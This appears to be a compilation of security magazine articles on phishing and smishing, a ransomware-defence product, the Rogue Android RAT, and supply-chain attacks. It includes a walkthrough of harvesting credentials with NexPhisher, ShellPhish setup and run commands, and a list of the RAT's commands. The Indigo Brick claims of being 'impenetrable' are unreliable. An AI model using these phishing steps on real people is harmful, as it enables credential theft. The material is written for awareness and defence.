The victim enters their credentials as asked.


On clicking on login, the victim gets redirected to the twitch account recovery page. The victim might be confused but there
are fewer chances of being suspicious.

The victim might try to login again or try following the recovery steps. While he/she does that, the attacker already has their
IP address and credentials.


You can find all the IP details in the ip.txt file.

In the logs folder, all the credentials of the phished victims are stored.

Let’s look into a few other templates. I chose Yahoo and selected the option localhost for this one.


A phishing page is created and the victim enters their credentials.

On trying to login, the victim gets redirected to the session expired page of Yahoo.


The attacker has the details by then.

NexPhisher also works perfectly for a login flow like Microsoft’s or Xbox’s, which uses separate pages for the email and the
password. Let’s look into it…

The phishing link is created with ngrok.


The webpage looks genuine but the link doesn’t. The victim enters their email and password if social engineering is
successful.


On trying to log in, the page refreshes to the actual Microsoft login page. The victim tries to log in a second time, succeeds,
and so no suspicion arises.

By that time, the attacker has already obtained the credentials.


Phishing is a common practice these days. People can avoid getting phished if they stay vigilant: avoid opening suspicious
links and never enter credentials on untrusted websites.

SMISHING - PHISHING ATTACKS THROUGH TEXT MESSAGES
CLEBER SOARES
Enthusiast and researcher in Information Security, adept at the free software culture, he has worked in the technology area for
more than 20 years, passing through national and multinational companies. He has technical courses in Data Processing, a
degree in Computer Networks and postgraduate work in Ethical Hacking and Cyber Security. He acts as an Information
Security Analyst and Ad-hoc Forensic Computer Expert, is Leader of the OWASP Belém Chapter at the OWASP Foundation
and an author at Hacker Culture.

DEIVISON FRANCO
CEO at aCCESS Security Lab. Master’s degrees in Computer Science and in Business Administration. Specialist degrees in
Forensic Science (Emphasis in Computer Forensics) and in Computer Networks Support. Degree in Data Processing.
Researcher and Consultant in Computer Forensics and Information Security. Member of the IEEE Information Forensics and
Security Technical Committee (IEEE IFS-TC) and of the Brazilian Society of Forensic Sciences (SBCF). C|EH, C|HFI, DSFE and
ISO 27002 Senior Manager. Author and technical reviewer of the book “Treatise of Computer Forensics”. Reviewer and
editorial board member of the Brazilian Journal of Criminalistics and of the Digital Security Magazine.

SMISHING - Phishing Attacks Through Text Messages

The world is evolving so fast that it's hard to keep up with all the new technologies. Thus, crimes committed through
technological devices are full of peculiarities that differ from conventional crimes. Phishing, for example, which is
fraudulently obtaining electronic data over the internet, is generally typified as embezzlement or qualified theft, the
consequences of which can open security breaches and cause damage to companies.

In this article, Smishing will be presented: a type of technological fraud and a variant of Phishing, alongside Spear Phishing,
Vishing, Offline Phishing, Dumpster Diving, Typosquatting, QR Code phishing, Pharming and Link Shorteners. The article
clarifies the kinds of attack its readers are exposed to, how to recognise them, and how to prevent and avoid them in both
the corporate and the personal environment.

THE ORIGIN OF PHISHING

On January 28, 1996, the term phishing emerged from an attempt to obtain Internet access credentials from employees of
the world's largest Internet provider, AOL-America Online, which distributed promotional floppy disks and CDs with some
hours of free internet access, making it quite popular.

In a forum called "AOL for free?", user mk590 posted the following sentence:

"What happens is that in the past, you could make a fake AOL account once you had a credit card generator. However,
AOL was smart. Now, after entering the card details, a check is done with the respective bank. Does anyone else know
any other way to acquire an account than through Phishing?"

At that time, to connect to the internet by dial-up through AOL, users had to register using their credit card.

Cybercriminals started sharing a freely distributed program called AOHell, whose first version was released in 1994 by
unknown authors. It generated random credit card numbers to complete the registration and open accounts, because AOL
did not validate them. As time went on, the company started validating the numbers with the credit card companies.


Figure 1. The AOHell program, which managed AOL credentials and credit cards.

SPAM AND PHISHING: WHAT DO THEY HAVE IN COMMON?

The acronym Spam corresponds to “Sending and Posting Advertisement in Mass”. By analogy, we can say that it is the
electronic version of flyers, posters or a link offering some product. Spammers, as those behind this type of action are known,
have as their main objective to send the greatest possible number of unsolicited emails to as many users as possible; these
emails may be malicious or may merely advertise products and services, sometimes questionable ones promising excessive
advantages.

Many email services have protections and provide reporting tools. However, according to Cert.br, the group responsible for
responding to and handling Internet Security Incidents in Brazil, maintained by NIC.br (Ponto BR Information and
Coordination Center), in 2019, 867,920 unwanted emails were reported.


Figure 2. Spams reported to CERT per year.

THE SMISHING

Smishing is a cybercrime technique derived from phishing; the name combines "SMS" with "phishing". It uses text messages
sent via SMS (Short Message Service) or cross-platform messaging applications to spread links with false news and
information in an attempt to capture passwords and personal information. The following image shows the anatomy of an
attack.

Figure 3. The anatomy of a smishing attack.


Classic examples of fraudulent SMS impersonate financial institutions and well-known telephone operators, request a
"Token update" and back the persuasive message with a tacit threat, using terms such as “avoid blocking of your account”
or "otherwise your account will be blocked".

Figure 4. Examples of fraudulent SMS.

Some streaming companies are also being used as bait. In the example below, Netflix was offered for "free": the user entered
personal data by answering some registration questions. What was actually behind the false advertisement was that the
“free subscription” was used to sign a public petition to support and/or overthrow governments, in addition to data theft.
Another detail is that the same site has been adapted to other languages.

Figure 5. Link forwarded to a technology group via WhatsApp, with the petition URL found on the website.

Figure 6. Language detection script.

On December 31, 2019, the World Health Organization released the first warning of the emergence of the
coronavirus/COVID-19. Cybercrime soon took advantage of the opportunity to forward malicious links, exploiting the general
panic of the population and the rush for basic items such as alcohol gel and masks. In the examples below, cybercriminals
announced an alleged free distribution of alcohol gel using the name of a well-known beverage company, Ambev, and
financial aid of between R$600 and R$1,200 aimed at specific low-income groups; victims were redirected to a registration
form. However, after the victim typed in their information, they were asked to share the link with a certain number of people
or groups on cross-platform instant messaging applications.

Figure 7. Advertising image of the Ambev company.


Figure 8. Redirection URL and data retrieval.

Figure 9. Fraudulent advertising image on behalf of the alleged government aid.

TOOLS

Using the following tool(s) to attack targets without prior consent is illegal; users are responsible for complying with all
local laws.

This article is for educational and warning purposes, in which I am not responsible for any misuse, injury or damage
caused.


ShellPhish – One of the widely used open-source phishing tools; it has become quite popular for hosting phishing pages to
obtain credentials such as user id and password. It has several versions and offers phishing web page templates for more
than 29 social media sites, such as Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix,
Linkedin and others.

The tool does not come by default on pentest distributions like Kali Linux or ParrotOS, so it needs to be downloaded from
the official GitHub repository.

Open a terminal on your GNU/Linux system and choose a directory to download into; in this article, we chose Documents.

# git clone https://github.com/AbirHasan2005/ShellPhish.git

Next, enter the ShellPhish directory with the cd command. Once inside, list the contents of the directory with the command
ls -l.

# cd ShellPhish

# ls -l

Make the script executable with the chmod +x command on shellphish.sh.

# chmod +x shellphish.sh

Now that the configuration is ready, let's run the ShellPhish tool with the command bash shellphish.sh or ./shellphish.sh in
your terminal. Run the command as root.

Figure 10. ShellPhish running.

Step 1 - We need to choose the option that will be used for phishing. We opted for option number 2, which is Instagram.

Step 2 - Next, we chose option number 1, “Traditional login page”.

Step 3 - The tool asks for the server option that will be used to forward the link. In our example, to demonstrate, we
chose option 1, "LocalHost."

Step 4 - We need to choose the port; by default it is 5555. Let's use the default setting and press enter.

ShellPhish carries out the entire service initialization process and delivers the URL used in this laboratory, where it served
an internal awareness campaign for an institution. To demonstrate how the tool works, the link was opened in the server's
own browser.


Figure 11. ShellPhish configs.

SmishingTools - Another tool, aimed at sending SMS, developed in HTML and Python by Ishan Saha, which is not in the
official GNU/Linux repositories. I tried to download the official repository from the github page
(https://github.com/ishan-saha/SmishingTool). It requires the free fast2sms API (https://www.fast2sms.com) to send the
SMS, tunnels with ngrok, and runs on the Flask micro web framework.

Figure 12. Smishing Tool running.

FINAL CONSIDERATIONS

Given the above, it is very important to be careful not to expose yourself and not become a victim of these and other types of
scams.


It is always recommended that under no circumstances should you click on unknown links; always check the address you
were sent, never reply to the SMS and, if in doubt, consult the official website directly. Never provide your data or fill in
suspicious forms.
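The checks this advice and the phishing walkthroughs above call for (links hosted on the tunnelling services NexPhisher and ShellPhish offer, such as ngrok, Serveo, LocalXpose and localhost.run; shortened links; the pressure phrases, token-update requests and brand impersonation in the SMS examples) can be turned into a small triage script for messages reported by users. The following is an added example written for this edition, not code from either article or from the tools they describe. The tunnel-service hostname suffixes, the shortener list, the brand-to-domain map, the scoring thresholds and the sample messages are all assumptions or constructed input.

```python
import re
from urllib.parse import urlparse

# Assumed hostname suffixes used by the tunnelling services the NexPhisher and
# ShellPhish menus offer (ngrok, Serveo, LocalXpose, localhost.run); keep them current.
TUNNEL_SUFFIXES = ("ngrok.io", "ngrok-free.app", "serveo.net", "loclx.io", "localhost.run")
# Public link shorteners; the NexPhisher walkthrough shortens the link to hide the host.
SHORTENER_HOSTS = {"bit.ly", "tinyurl.com", "t.co", "is.gd", "cutt.ly"}
# Pressure and lure phrases drawn from the SMS examples in the article.
LURE_PHRASES = (
    "account will be blocked", "avoid blocking", "token update", "update your token",
    "free subscription", "share this with", "financial aid",
)
# Brands the examples impersonate, mapped to domains they legitimately use (assumed).
BRAND_DOMAINS = {
    "twitch": ("twitch.tv",),
    "yahoo": ("yahoo.com",),
    "microsoft": ("microsoft.com", "live.com"),
    "xbox": ("xbox.com", "microsoft.com", "live.com"),
    "netflix": ("netflix.com",),
    "instagram": ("instagram.com",),
}
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def _under(host: str, domain: str) -> bool:
    """True when host is the domain itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def classify_host(host: str) -> str:
    """Label a hostname as shortener, tunnel, local or other."""
    h = host.lower().rstrip(".")
    if h in SHORTENER_HOSTS:
        return "shortener"
    if any(_under(h, s) for s in TUNNEL_SUFFIXES):
        return "tunnel"
    if h in ("localhost", "127.0.0.1") or h.startswith(("10.", "192.168.")):
        return "local"
    return "other"


def triage_message(text: str) -> dict:
    """Collect phishing indicators from one SMS or e-mail body and score them."""
    lowered = text.lower()
    indicators = []
    urls = URL_RE.findall(text)
    for url in urls:
        host = (urlparse(url).hostname or "").lower()
        kind = classify_host(host)
        if kind != "other":
            indicators.append(f"{kind}:{host}")
        # A brand is named in the text but the link does not go to that brand's domain.
        for brand, legit in BRAND_DOMAINS.items():
            if brand in lowered and not any(_under(host, d) for d in legit):
                indicators.append(f"brand-mismatch:{brand}->{host}")
    indicators += [f"lure:{p}" for p in LURE_PHRASES if p in lowered]
    score = len(indicators)
    verdict = "suspicious" if score >= 2 else ("review" if score == 1 else "clean")
    return {"urls": urls, "indicators": indicators, "score": score, "verdict": verdict}


# Constructed sample messages modelled on the article's examples (not real traffic).
SAMPLES = [
    "Your Twitch account will be blocked. Avoid blocking: https://bit.ly/3xyzabc",
    "Sign in to Xbox to keep your profile: https://abcd1234.ngrok.io/login",
    "Hi, the quarterly report is at https://docs.example.org/report.pdf",
]

if __name__ == "__main__":
    for msg in SAMPLES:
        result = triage_message(msg)
        print(result["verdict"], result["indicators"])
```

The brand-mismatch rule is the one that catches the Microsoft and Xbox clones described earlier even when the page itself looks genuine: the text names the brand, the link does not resolve under the brand's domain. Shortened links should be expanded (for example by a HEAD request from a sandboxed host) before the final hostname is classified; the script scores the shortener itself as an indicator because hiding the host is exactly what it is used for above.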

References

1. https://www.nist.gov/cyberframework
2. https://busy.org/@nowsourcing/the-future-of-phishing
3. https://github.com/AbirHasan2005/ShellPhish.git
4. https://docs.apwg.org/reports/apwg_trends_report_q3_2019.pdf
5. https://www.alyninc.com/2018/11/10/email-headers-what-can-they-tell-the-forensic-investigator

PROJECT INDIGO BRICK: NEW PATHWAYS IN DATA HANDLING
ATLAS STARK
Atlas Stark is a security researcher at Stark Industries Inc. with 16+ years in the technology industry. Currently providing
cyber security solutions and OSINT services to anti-human trafficking non-profits that aid in investigation and victim
recovery. He also consults with state level law enforcement agencies concerning hacking related incidents. He splits his time
between California and Tennessee.

Please email stark@starkinternational.se with any questions or concerns.

PROJECT INDIGO BRICK: New Pathways In Data Handling

Let’s face it, you can’t look at your phone, catch the local news or your favorite tech blog without seeing or hearing about a
recent ransomware attack, and each attack seems to be more sophisticated and severe than the last. From Linux to
Windows, and all the OSes in between, there seems to be a new security patch every day to combat the growing ransomware
problem. Vast resources from private and government entities have been allocated to fight this war. If it were a mere
resource problem, we would be closer to a solution, given the major corporate players that are pouring millions into the
coffers to solve the issue. However, this is a new quandary that needs a fresh fix.

In this article, we will not only explore the landscape of the problem that arises from ransomware attacks, but also some
patent pending software we have created that we believe can make a global difference in this fight and secure our data with
a new, dynamic solution. What is this solution, you ask? It’s called Project Indigo Brick.

It can be utilized as middleware, virtualized, or configured and installed at the bare-metal layer of any data infrastructure.

Project Indigo Brick is the project’s internal code name and was derived from one of my gamer profiles. We are still working
on marketing for a new name for the technology.

WHAT IS RANSOMWARE?

Simply put, ransomware is a piece of malware that is employed to hold the victim’s data hostage until a fee or “ransom” is
paid to release the encryption key so the victim can unlock and access their data. Some of the first instances of ransomware,
you may remember, utilized an “antivirus out of date” alert box that would pop up and once you interacted with the
message, it would deploy the malware thus locking your system. Later on, the victim would receive a phone call or an email
with a demand for payment to unlock the system and return control of the data back to the victim. This was the early days
of ransomware and involved attacking individuals rather than today’s attacks on large enterprises.

Today ransomware has graduated to a very sophisticated level of exploitation that puts our livelihoods at stake by
attacking the very infrastructure through which our systems and processes deliver goods and services, and with them
convenience, health and safety, to billions of people worldwide.

Ransomware has become an example of a “dark business model” adopted by a variety of threat actors in many theaters,
and cyber criminals from a variety of backgrounds are cashing in on the trend. The creation and resale of ransomware is
also a huge business, in which nefarious engineers can find a niche in this growing sector of the threat landscape. While
the true cost of ransomware is hard to determine, the shock waves definitely ripple throughout our current infrastructure
and usually end in a chaotic spiral that impacts the bottom line of many industries.

IMPACT OF RANSOMWARE

Data worth trillions is at rest on servers all over the world. Data at rest on a server is a sitting duck, waiting to be stolen by
highly intelligent, extremely skilled and strikingly malicious cyber criminals who can literally out-think and outmaneuver
current security infrastructure and the professionals whose job it is to protect the data that their enterprises require to stay
in business.

Cybercrime has become an acceptable loss that costs industries around the world billions every year. In fact, damage
related to cybercrime is set to hit $6 trillion by the end of 2021, making investing in security spending a priority.

Our world requires a more effective and global defense against frontal attacks on the data foundation and infrastructure
that, when compromised, can bring the downfall of the financial systems, the grid, healthcare, transportation, all branches
of government, the military, every business, charities and schools. It all runs on data, and all of that data is at risk in the
hands of hackers, both foreign and domestic, who have figured out how to penetrate some of the largest and most secure
data stores on earth. Below are some, but definitely not all, of the statistics that display only a fraction of the impact of
ransomware attacks.

• 90% of all financial institutions have experienced ransomware in the past year. (betanews.com)

• Atlanta – The ransomware demand was $51,000 (unpaid) while the recovery costs were estimated at $17 million.

• The NotPetya ransomware attack cost FedEx $300 million in Q1 2017. (Source: Reuters)

• A disabling virus spread to 10,000 machines in TSMC’s most secure and advanced facilities.

• The fitness brand Under Armour breach affected 150 million users.

Financial Institutions – in 2019:

• More than 204,448 users experienced an attempt to hack their banking information

• More than 280,000,000 URLs were identified as malicious

• Cybersecurity statistics show attacks were launched from within more than 190 countries

• Attacks on individuals doubled in 2018

• Attacks on businesses increased to one every 40 seconds

• Colonial Pipeline in 2021

LASTING IMPACT:

Another aspect of a ransomware attack is the lasting impact it inflicts upon communities everywhere. Long after the
ransom is paid, the company somewhat rebounds from stored backups and the attackers are apprehended, the effects of the
incident can still be felt once the dust settles. Whether it is a temporary loss of a service, an increase in the cost of a utility
or, in some cases, as with several clinics around the world, total financial ruin, the result is to cut off support for
thousands of people who depend on those services to maintain their daily quality of life. It seems not even healthcare and
education are safe from being targeted, which only compounds the problem and demands a supreme effort to combat the
threat.

WHAT’S THE SOLUTION?

The Department of Homeland Security has publicly stated the following, “The static nature of...systems provides
the attacker with an incredible advantage, as adversaries are able to take their time and plan attacks at
their leisure...Moving Target Defense would be a game-changing capability, that dynamically shifts the
attack surface, making it difficult for attackers to strike.”

A new and relevant mindset has to be achieved to truly solve the issue and we need to think of new ways to handle data
instead of static storage solutions that house critical data and employ out of date security protocols, thus providing a
vulnerable attack surface. Project Indigo Brick was born out of this new mindset in regards to how we handle all data and
interact with data-dependent services.

Project Indigo Brick’s file splitting, randomization and transit system makes the data impossible to penetrate because it
makes all data an array of moving targets, constantly in motion, all of the time. Project Indigo Brick breaks files into several
pieces, puts the data in motion across multiple pathways and reassembles the data when requested by a company’s cyber
security professional through a secured system or the company’s designated secure workstation. This is the ultimate in risk
mitigation. The goal of Project Indigo Brick is to enable large data-dependent companies to protect their data and introduce
them to new pathways in data handling.

WHAT DOES IT DO?

Data that is created or migrated is sent through the file splitting platform of Project Indigo Brick. Once the data passes
through the file splitting module of Project Indigo Brick, the data is deconstructed into smaller fragments that are
encrypted and given a specific token identifier. Once the data is sent to the server by way of an encrypted tunnel, each piece
of the data is rotated in a random pattern among each of the servers staying in constant motion, meaning that each
deconstructed fragment of data is transferred from one server to the next, randomly, within the framework of Indigo Brick.
Every time each data fragment goes to a different server, the identifying token changes and the old tokens are purged from
the pool, instead of being stored in a hidden file location that may or may not be discovered by an attacker.

FILE SPLITTING:

There are file splitting technologies in place today; however, files are usually split according to user preference, making
them vulnerable to harvesting attacks. Project Indigo Brick’s File Splitting Platform is different in that the computer
decides how many encrypted file fragments to generate and the size of each, using a custom randomization algorithm.
(i.e., File 1 is 200 MB in size and is randomly split into nine pieces; instead of each piece being 0.045 in size, each piece
would differ in size, and they would still equal 200 MB when added together, with the addition of a byte or two.)

DATA PATHWAYS

The data stays within the boundaries of the data center or predetermined servers that the data will rotate between.

Once the data set has been segmented, the fragments are put into motion using a similar randomization algorithm that
prevents an attacker from following the data bits from one location to another. As the data passes from server to server, a
new fragment token is generated, and the same token is never used more than once. All of the data rotates among servers
but never resides on the same server at one time. Each time the data is routed to a new server, it is re-encrypted with a new
unique key. Once the data is called up by way of encrypted tokens, it is reassembled and sent to the requesting device, by
way of the master key in the hands of a trusted individual or security professional in the physical location where the main
terminal is installed, or by way of a secured and approved appliance.
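The FILE SPLITTING and DATA PATHWAYS sections above describe random-sized fragments, one-time fragment tokens that change at every hop, and reassembly gated by a master key. The following added example, written for this edition and not Indigo Brick's own code, shows the non-obvious parts of such a design in plain Python: cut points chosen so the fragment sizes differ yet sum exactly to the original, a manifest that only the key holder keeps, token rotation that purges the old token from the pool, and reassembly that refuses stale, tampered or missing fragments. Per-fragment encryption, which the article describes, is left out; a real implementation would encrypt each fragment under a fresh per-hop key (an AEAD) before it moves. The master key, the data and the fragment count are constructed values.

```python
import hashlib
import hmac
import secrets

_rng = secrets.SystemRandom()


def random_sizes(total: int, pieces: int) -> list:
    """Choose `pieces` positive sizes that differ at random yet sum exactly to `total`."""
    if not 1 <= pieces <= total:
        raise ValueError("need 1 <= pieces <= total")
    # pieces-1 distinct cut points inside (0, total) give pieces non-empty ranges.
    cuts = sorted(_rng.sample(range(1, total), pieces - 1))
    bounds = [0] + cuts + [total]
    return [hi - lo for lo, hi in zip(bounds, bounds[1:])]


def _tag(master_key: bytes, index: int, token: str, chunk: bytes) -> str:
    """HMAC binding a fragment's bytes to its position and its current token."""
    return hmac.new(master_key, f"{index}:{token}:".encode() + chunk, hashlib.sha256).hexdigest()


def split_data(data: bytes, master_key: bytes, pieces: int):
    """Fragment `data`; return the fragments plus the manifest only the key holder keeps."""
    manifest = {"length": len(data), "digest": hashlib.sha256(data).hexdigest(), "tokens": {}}
    fragments, offset = [], 0
    for index, size in enumerate(random_sizes(len(data), pieces)):
        chunk = data[offset:offset + size]
        offset += size
        token = secrets.token_hex(16)          # one-time identifier for this fragment
        manifest["tokens"][token] = index      # the manifest is the only order record
        fragments.append({"index": index, "token": token,
                          "tag": _tag(master_key, index, token, chunk), "data": chunk})
    return fragments, manifest


def rotate(fragment: dict, manifest: dict, master_key: bytes) -> dict:
    """One hop between servers: issue a fresh token and purge the old one from the pool."""
    new_token = secrets.token_hex(16)
    del manifest["tokens"][fragment["token"]]  # old token is never valid again
    manifest["tokens"][new_token] = fragment["index"]
    return {"index": fragment["index"], "token": new_token,
            "tag": _tag(master_key, fragment["index"], new_token, fragment["data"]),
            "data": fragment["data"]}


def reassemble(fragments: list, manifest: dict, master_key: bytes) -> bytes:
    """Rebuild the original bytes, refusing stale, tampered or missing fragments."""
    slots = [None] * len(manifest["tokens"])
    for frag in fragments:
        index = manifest["tokens"].get(frag["token"])
        if index is None or index != frag["index"]:
            raise ValueError("unknown or purged token")
        expected = _tag(master_key, index, frag["token"], frag["data"])
        if not hmac.compare_digest(expected, frag["tag"]):
            raise ValueError(f"fragment {index} failed integrity check")
        slots[index] = frag["data"]
    if any(s is None for s in slots):
        raise ValueError("missing fragment")
    data = b"".join(slots)
    if len(data) != manifest["length"] or hashlib.sha256(data).hexdigest() != manifest["digest"]:
        raise ValueError("reassembled data does not match manifest")
    return data


def rejects(fragments: list, manifest: dict, master_key: bytes) -> bool:
    """True when reassemble() refuses the input; used to show the failure handling."""
    try:
        reassemble(fragments, manifest, master_key)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    key = b"constructed-master-key"            # constructed, not a real key
    blob = bytes(range(256)) * 4               # 1024 constructed bytes
    frags, manifest = split_data(blob, key, 9)
    print("sizes:", [len(f["data"]) for f in frags])
    frags[3] = rotate(frags[3], key=master_key, manifest=manifest) if False else rotate(frags[3], manifest, key)
    print("round trip ok:", reassemble(frags, manifest, key) == blob)
```

Two points the prose leaves implicit come out in the code. First, fragment order lives nowhere except the manifest, so the manifest (not just the key) is what the "master key holder" must protect; a copy of it is as sensitive as the key. Second, the HMAC check is what makes the stated "never reuse a token" property enforceable: a server holding a purged token cannot replay an old fragment, and a modified fragment is rejected before reassembly rather than silently producing corrupt data.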


WHY IS IT IMPORTANT?

This methodology is applicable to every form of vulnerable communication that we call data; emails, photos, medical data,
personal financial information, credit card transactions, file downloads, file uploads, audio, video, photos, software code,
secret formulas, bank account numbers, routing numbers, names and addresses, insurance policies, tax returns, top-secret
military intel and plans – in short—all forms of data.

HOW SECURE IS IT?

Anyone attempting to steal a file could only get a fragment of that file, even if they could get through the high level of
encryption on that single fragment. Even if a hacker could penetrate every server and steal all of the pieces, he still couldn't
reassemble the file without the master key, which is a physical item in the hands of a trusted individual. A hacker would
have to be physically present in a locked down server room and be in possession of the physical key to all of the data on the
single authorized workstation in order to steal it. The system is designed to be impenetrable, so the sensitive data is always
in motion, segmented and encrypted. A physical key and an approved and provisioned workstation is required to
reassemble the data into meaningful information.


In closing, Project Indigo Brick aims to make data and electronic file handling more secure. Our approach to our technology
is threefold and can be summed up with the following bullet points.

1. Unique algorithms.

2. Advanced security protocols.

3. Interoperability with conventional and legacy systems.


We feel this is our secret recipe for the following reasons. Unique algorithms provide a foundation for new and fresh
approaches to old problems that desperately need solving. Our advanced security protocols within our technology were
designed from the minds of the adversary and have been tested in non-permissible environments instead of controlled
vulnerable spaces. Lastly, because there is a lot of existing legacy hardware that we depend on daily, our tech must be able
to operate in those hardware and software environments to be utilized on a large scale and attractive to data centers.

I hope this article was helpful in realizing the threat of ransomware, but also that, at the end of the day, there is a pot of
gold at the end of the rainbow.

Links and Resources:

1. https://betanews.com/

2. https://statista.com/

3. https://www.statista.com/topics/4136/ransomware/

4. https://threatpost.com/takeaways-colonial-pipeline-ransomware/166980/

5. Avast-Ransomware Article

6. Ukrainian Ransomware raid

7. https://www.darkreading.com/attacks-breaches/ransomware-is-not-the-problem

ROGUE - HACKERS, RAT AND "MARKETING" ON THE DARK WEB
FELIPE HIFRAM
He is currently an information security professional focused on social engineering, good usage habits and privacy on the
internet. He has already done work in Brazil, Germany, Ukraine, Oman and Bahrain, in addition to writing several other
articles.

Rogue - Hackers, RAT And "Marketing" On The Dark Web

1 PRINCIPLE OF EVERYTHING
It is a fact that nowadays many cyber criminals show off their achievements in dark web forums, but I swear to you
that in my years of experience with cybersecurity, I have never seen marketing as strong as I am seeing with the Rogue RAT.
A few years ago, in 2017, a hacker nicknamed Triangulum appeared on some forums on the dark side of the internet,
apparently in search of recognition. For a while he showed off his skills (which were not at all impressive) on the forum, then
tried to sell one of his products, but did not get the fame I believe he was looking for.

Triangulum sought partnerships, as revealed by some reports of his activity on the forum in 2017, and we believe that it was
in this search that he obtained the support of HeXaGoN, another hacker, known for his high ability in developing RAT tools
and other malware. Support was apparently what had been missing: for more than a year Triangulum disappeared from the
network, returning in April 2019 with a new product to sell, and in the middle of 2020 he announced four different products
on the network.

The partnership with HeXaGoN was perfect, since now there was a real “Steve Jobs and Steve Wozniak” duo: while one
developed new tools, the other was engaged in marketing.

Triangulum started to treat marketing with more importance; his commitment to creating attractive and well-made images
to advertise his “products” was noticeable.

Some failures in negotiations with Russian forums have also been found.

2 ROGUE, THE CROWN JEWEL

After acquiring some experiences with marketing within the forum environments, the pair started to focus their efforts on
the newest product, a powerful MRAT malware, capable of giving almost full access to any infected Android phone.

After an analysis, it was discovered that Rogue is actually a mixture of two known malware, DarkShades and Hawkshaw.

DarkShades was developed by HeXaGoN, which announced its sales in 2019, but three days later officially sold the malware
to Triangulum. And Hawkshaw was malware whose source code leaked onto the network in 2017.

The joining of the families of these malware resulted in what we know today as Rogue.

2.1 A technical look

Rogue is a persistent malware; when it infects a device, it will soon ask for all the permissions it needs to start its activity,
and it will continue to request all of them until the user surrenders and gives permission. After that, the malware will
camouflage itself, hiding its own icon, in addition to registering as a device administrator.


And it doesn't stop there: if the user tries to remove Rogue's administrator role, a message is displayed, “Are you sure you
want to clear all data??”, with the purpose of scaring the person into giving up the attempt. In order to proceed with its
activities without being detected, Rogue relies on the services of the platform known as Firebase, a legitimate service from
Google. The malware uses this service as its command and control (C&C) server, using Google's authentic service
infrastructure to deliver the stolen information and the commands that control the malware. As a user of the Firebase
platform, Rogue uses three of the services Google offers on it:

• “Cloud Messaging” to receive commands from the server;

• “Realtime Database” to upload data from the infected device;

• “Cloud Firestore” to upload files.

What's more, depending on the value of the APP_VERSION entry in the malware file, it can be executed in a way that
draws the least attention.

2.2 Multiplying

As if everything mentioned was not enough, the malware is able to abuse the device's accessibility service, which is
normally used to assist elderly or disabled users, and which is capable of automating interactions by simulating clicks.

By making use of the accessibility service, the malware evades the Android security controls, which end up unable to
inhibit its actions. In the case of Rogue, it uses the accessibility service to record user actions and send the collected data
to the cloud.

As a sniffer, Rogue carries its own notification service, which lets it see every notification that reaches the infected device,
saving them in a directory created on the device itself and then sending them to the Firebase database.

Rogue also has the ability to split notifications into three categories:

• Message Body;
• Sender;
• Timestamp.

And it separates the notifications interpreted as potential sources of confidential information:

• com.facebook.katana;
• com.facebook.orca;
• com.instagram.android;
• com.whatsapp;
• com.skype.raider;
• org.telegram.messenger;
• kik.android;
• jp.naver.line.android;
• com.google.android.gm;
• com.tencent.mm

In addition to what has already been mentioned, the malware has a “Block List” service, in which certain numbers (chosen by
the malware itself) can be diverted, giving the malware the power to hang up a call if it detects an incoming or outgoing call
involving a number on the list. And if you accept a call, Rogue can record it and send it to the Firebase Cloud Store.

2.3 Functions and Commands:

As a summary of all the characteristics of the malware:

- Take pictures of the screen;
- Access the camera;
- Access the location;
- Reject connections;
- Record calls;
- Access contact list;
- Access the microphone;
- Access Bluetooth and Wi-Fi;
- Keylogger (monitor what is typed);
- Access technical information of the device;
- Read and save notifications (Facebook, WhatsApp, Instagram, Telegram, Skype and Line);
- Access logins (including bank applications);

...and more! All in real time.

Now, a list of malware commands:

- getLocation: Save location
- getMessages: Save SMS messages
- makeCall: Starts a phone call to a number provided
- getImages: Save your photos
- deleteCallLog: Deletes call records
- fileExplorer: Stores a list of directories
- recordCamera: Starts recording with the camera
- installApp: Install an application
- syncWhatsappMessages: Upload Whatsapp messages
- fileDownloadToLocal: Download a file
- deviceAdmin: Enable administrator permission
- openApp: Launch an application
- getContacts: Download your contacts
- root: Run a shell command
- takePicture: Take a Picture
- deleteFile: Deletes a file or directory
- downloadFile / uploadFile: Load a file
- sendMessage: Send an SMS
- recordScreen: Records a video from the screen
- deleteContact: Deletes a contact
- takeScreenShot: Take a picture of the screen
- recordAudio: Record an audio
- deviceInfo: Gathers technical information from the device
- deleteApp: Uninstall an application
- clearWhatsappMessages: Deletes Whatsapp messages from the local database

3 TODAY

Exactly one year ago, the Rogue RAT was leaked on an internet forum (dark web), but even after the leak, there was a lot of
demand for the purchase of the malware.

After learning about the entire process that led to the sale of this malware, it is clear how exposed mobile devices are today.

Just as these two individuals carry on with their sales, others have developed and launched their own products on the illegal market.

4 TAKE COVER

Protecting yourself against this type of threat comes down to a few simple habits. The main ones are:

- Only download apps from official stores;
- Do not click on links in e-mails from senders you do not recognize;
- Do not download attachments from an e-mail you were not expecting;
- Do not use public Wi-Fi networks;
- Pay attention to the permissions that apps request;
- Keep an antivirus on your device.

REFERENCES:

The credit for the content of this article goes to the people of Check Point Research. Their research and the report they subsequently published were the basis for this article. All the details of the research can be found at:
https://blog.checkpoint.com/2021/01/12/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/

SECURING THE SUPPLY CHAIN
SYED PEER
The author is a seasoned 20-year IT professional having worked in Fortune 400 companies across diverse verticals from Social Media to Banking to Cyber Security, with experience managing Software Development, Engineering, and Cyber Security teams.

Securing The Supply Chain

“Software is eating the world" ― Marc Andreessen

INTRODUCTION

At no time since the dawn of the Industrial Revolution have manufacturing businesses benefited so much from the diversification and choice of vendors, the globalization of suppliers and manpower services, and the accelerated growth of the customer base made possible by improved infrastructure, shipping routes, and the internet.

However, while software has brought immense accessibility and reach to billions of customers, it has also become an Achilles heel: in the hands of bad actors it can disrupt, destroy and debilitate otherwise healthy and profitable organizations.

DEFINITION

As defined by Wikipedia, "A supply chain attack is a cyber-attack that seeks to damage an organization by targeting less-secure elements in the supply chain. A supply chain attack can occur in any industry, from the financial sector, oil industry, to a government sector.” Although there are many ways to define and explain the term, the key takeaway from this definition is the “less-secure” element, which is a constant in every cyber security defense conversation.

BACKGROUND

The “modus operandi” of a supply chain attack is that an individual or team of bad actors targets an organization not directly (that would be too obvious) but through an external trusted partner or supplier who has some manner of access to the organization’s systems. This route has grown in popularity over the last few years and has transformed the attack surface significantly: it is no longer just the target organization itself but every company, supplier, and service provider that has any touchpoint with the organization.

[Figure omitted; courtesy keepersecurity.com]

This now presents a clear and present danger to organizations as sensitive data inside the organization that is accessible by
